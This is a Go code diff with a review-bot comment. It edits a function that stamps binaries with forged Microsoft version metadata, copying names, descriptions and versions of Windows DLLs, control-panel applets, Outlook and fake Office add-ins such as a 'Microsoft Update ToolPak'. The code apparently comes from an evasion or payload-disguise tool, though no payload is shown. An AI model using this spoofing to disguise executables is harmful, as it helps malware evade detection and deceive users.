@@ -211,7 +238,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "bisrv.dll.mui" } if name == "btpanui" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "btpanui.dll.mui" vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800" @@ -229,7 +255,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "btpanui.dll.mui" } if name == "certcli" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "CertCli" vi.StringFileInfo.FileDescription = "Microsoft® Active Directory Certificate Services Client" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -247,7 +272,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "CertCli" } if name == "cmdext" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "CmdExt.DLL" vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL" vi.StringFileInfo.FileVersion = "10.0.19041.1023 (WinBuild.160101.0800)" @@ -265,7 +289,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "CmdExt.DLL" } if name == "httpapi" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "httpapi.dll.mui" vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -283,7 +306,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "httpapi.dll.mui" } if name == "logoncli" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "LOGONCLI.DLL" vi.StringFileInfo.FileDescription = "Net Logon Client DLL" vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)" 
@@ -301,7 +323,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "LOGONCLI.DLL" } if name == "netlogon" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" vi.StringFileInfo.FileDescription = "Net Logon Services DLL" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -319,7 +340,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" } if name == "tcpmon" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "tcpmon.dll.mui" vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL" vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" @@ -396,7 +416,7 @@ func FileProperties(name string, configFile string) string { } if name == "Outlook" { vi.IconPath = "outlook.ico" - vi.StringFileInfo.InternalName = "Outlook" + vi.StringFileInfo.InternalName = "Outlook.exe" vi.StringFileInfo.FileDescription = "Microsoft Outlook" vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." vi.StringFileInfo.FileVersion = "16.0.14326.20404" @@ -407,7 +427,10 @@ func FileProperties(name string, configFile string) string { vi.FixedFileInfo.FileVersion.Minor = 0 vi.FixedFileInfo.FileVersion.Patch = 14326 vi.FixedFileInfo.FileVersion.Build = 20404 - vi.StringFileInfo.InternalName = "Outlook" + vi.FixedFileInfo.ProductVersion.Patch = 14326 + vi.FixedFileInfo.ProductVersion.Major = 16 + vi.FixedFileInfo.ProductVersion.Minor = 0 + vi.StringFileInfo.InternalName = "Outlook.exe" } if name == "lync" { vi.IconPath = "lync.ico" 
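Review bot: The `Outlook` branch assigns `vi.StringFileInfo.InternalName = "Outlook.exe"` twice, once in the hunk at old line 396 and again at the end of the hunk at old line 407, and both assignments are rewritten by this commit, so the second one can be dropped without changing the result. The `FileProperties` body starts and ends outside these hunks.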
@@ -455,7 +478,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "OneDrive.exe" } if name == "apphelp" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Apphelp" vi.StringFileInfo.FileDescription = "Application Compatibility Client Library" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -473,7 +495,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "Apphelp.dll" } if name == "bcryptprimitives" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "bcryptprimitives.dll" vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library" vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)" @@ -491,7 +512,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll" } if name == "cfgmgr32" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "cfgmgr32.dll" vi.StringFileInfo.FileDescription = "Configuration Manager DLL" vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)" @@ -509,7 +529,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll" } if name == "combase" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "COMBASE.DLL" vi.StringFileInfo.FileDescription = "Microsoft COM for Windows" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 
@@ -527,7 +546,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "COMBASE.DLL" } if name == "cryptsp" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "cryptsp.dll" vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -545,7 +563,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "cryptsp.dll" } if name == "dnsapi" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "dnsapi" vi.StringFileInfo.FileDescription = "DNS Client API DLL" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -563,7 +580,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "dnsapi" } if name == "dpapi" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "dpapi.dll" vi.StringFileInfo.FileDescription = "Data Protection API" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -581,7 +597,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "dpapi.dll" } if name == "sechost" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "sechost.dll" vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -599,7 +614,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "sechost.dll" } if name == "schannel" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "schannel.dll" vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 
@@ -617,7 +631,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "schannel.dll" } if name == "urlmon" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "UrlMon.dll" vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32" vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)" @@ -635,7 +648,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "UrlMon.dll" } if name == "win32u" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Win32u" vi.StringFileInfo.FileDescription = "Win32u" vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)" @@ -653,7 +665,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.OriginalFilename = "Win32u" } if name == "appwizard" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "appwiz.cpl" vi.StringFileInfo.FileDescription = "Shell Application Manager" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -671,7 +682,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "appwiz.cpl" } if name == "bthprop" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "bthprops.cpl" vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -689,7 +699,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "bthprops.cpl" } if name == "desktop" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "desk.cpl" vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 
@@ -708,7 +717,6 @@ func FileProperties(name string, configFile string) string { } if name == "netfirewall" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Firewall.cpl" vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -726,7 +734,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Firewall.cpl" } if name == "FlashPlayer" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0" vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet" vi.StringFileInfo.FileVersion = "32.0.0.255" @@ -744,7 +751,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "FlashPlayerCPLApp.cpl" } if name == "hardwarewiz" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "hdwwiz.cpl" vi.StringFileInfo.FileDescription = "Add Hardware Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -762,7 +768,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "hdwwiz" } if name == "inet" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "inetcpl.cpl" vi.StringFileInfo.FileDescription = "Internet Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -780,7 +785,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "inetcpl.cpl" } if name == "control" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "intl.cpl" vi.StringFileInfo.FileDescription = "Control Panel DLL" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 
@@ -798,7 +802,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "CONTROL" } if name == "irprop" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "irprops.cpl" vi.StringFileInfo.FileDescription = "Infrared Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -816,7 +819,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Infrared Properties" } if name == "Game" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "joy.cpl" vi.StringFileInfo.FileDescription = "Game Controllers Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -834,7 +836,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "JOY.CPL" } if name == "inputs" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "main.cpl" vi.StringFileInfo.FileDescription = "Mouse and Keyboard Control Panel Applets" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -853,7 +854,6 @@ func FileProperties(name string, configFile string) string { } if name == "mimosys" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "mmsys.dll" vi.StringFileInfo.FileDescription = "Audio Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -871,7 +871,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "mmsys.cpl" } if name == "ncp" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "ncpa.cpl" vi.StringFileInfo.FileDescription = "Network Connections Control-Panel Stub" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 
@@ -889,7 +888,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "ncpa.cpl" } if name == "power" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "powercfg.cpl" vi.StringFileInfo.FileDescription = "Power Management Configuration Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -907,7 +905,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "powercfg.cpl" } if name == "speech" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "sapi.cpl" vi.StringFileInfo.FileDescription = "Speech UX Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -926,7 +923,6 @@ func FileProperties(name string, configFile string) string { } if name == "system" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "sysdm.cpl" vi.StringFileInfo.FileDescription = "System Applet for the Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -944,7 +940,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "sysdm.cpl" } if name == "Tablet" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "TabletPC.cpl" vi.StringFileInfo.FileDescription = "Tablet PC Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -962,7 +957,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "TabletPC.cpl" } if name == "telephone" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "telephon.cpl" vi.StringFileInfo.FileDescription = "Telephony Control Panel" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 
@@ -980,7 +974,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "telephon.cpl" } if name == "datetime" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "timedate.cpl" vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -998,7 +991,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "timedate.cpl" } if name == "winsec" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "wscui.cpl" vi.StringFileInfo.FileDescription = "Security and Maintenance" vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" @@ -1016,7 +1008,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "wscui.cpl" } if name == "Timesheet" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Timesheet.xll " vi.StringFileInfo.FileDescription = "Timesheet ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1034,7 +1025,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Timesheet.xll" } if name == "Reports" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Reports.xll " vi.StringFileInfo.FileDescription = "Report ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1052,7 +1042,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Reports.xll" } if name == "Zoom" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Zoom.xll" vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" 
@@ -1070,7 +1059,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Zoom.xll" } if name == "Updates" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Updates.xll " vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1089,7 +1077,6 @@ func FileProperties(name string, configFile string) string { } if name == "Calendar" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Calendar.xll " vi.StringFileInfo.FileDescription = "Calendar ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1107,7 +1094,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Calendar.xll" } if name == "Memo" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Memo.xll " vi.StringFileInfo.FileDescription = "Memo ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1125,7 +1111,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Memo.xll" } if name == "Desk" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Desk.xll " vi.StringFileInfo.FileDescription = "Office Desktop ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1144,7 +1129,6 @@ func FileProperties(name string, configFile string) string { } if name == "Appwiz" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Appwiz.xll " vi.StringFileInfo.FileDescription = "Application Installer ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" 
@@ -1163,15 +1147,13 @@ func FileProperties(name string, configFile string) string { } } - vi.StringFileInfo.CompanyName = "Microsoft Corporation" - vi.Build() vi.Walk() var archs []string archs = []string{"amd64"} for _, item := range archs { - fileout := "resource_windows.syso" + fileout := "fart.syso" if err := vi.WriteSyso(fileout, item); err != nil { log.Printf("Error writing syso: %v", err) os.Exit(3)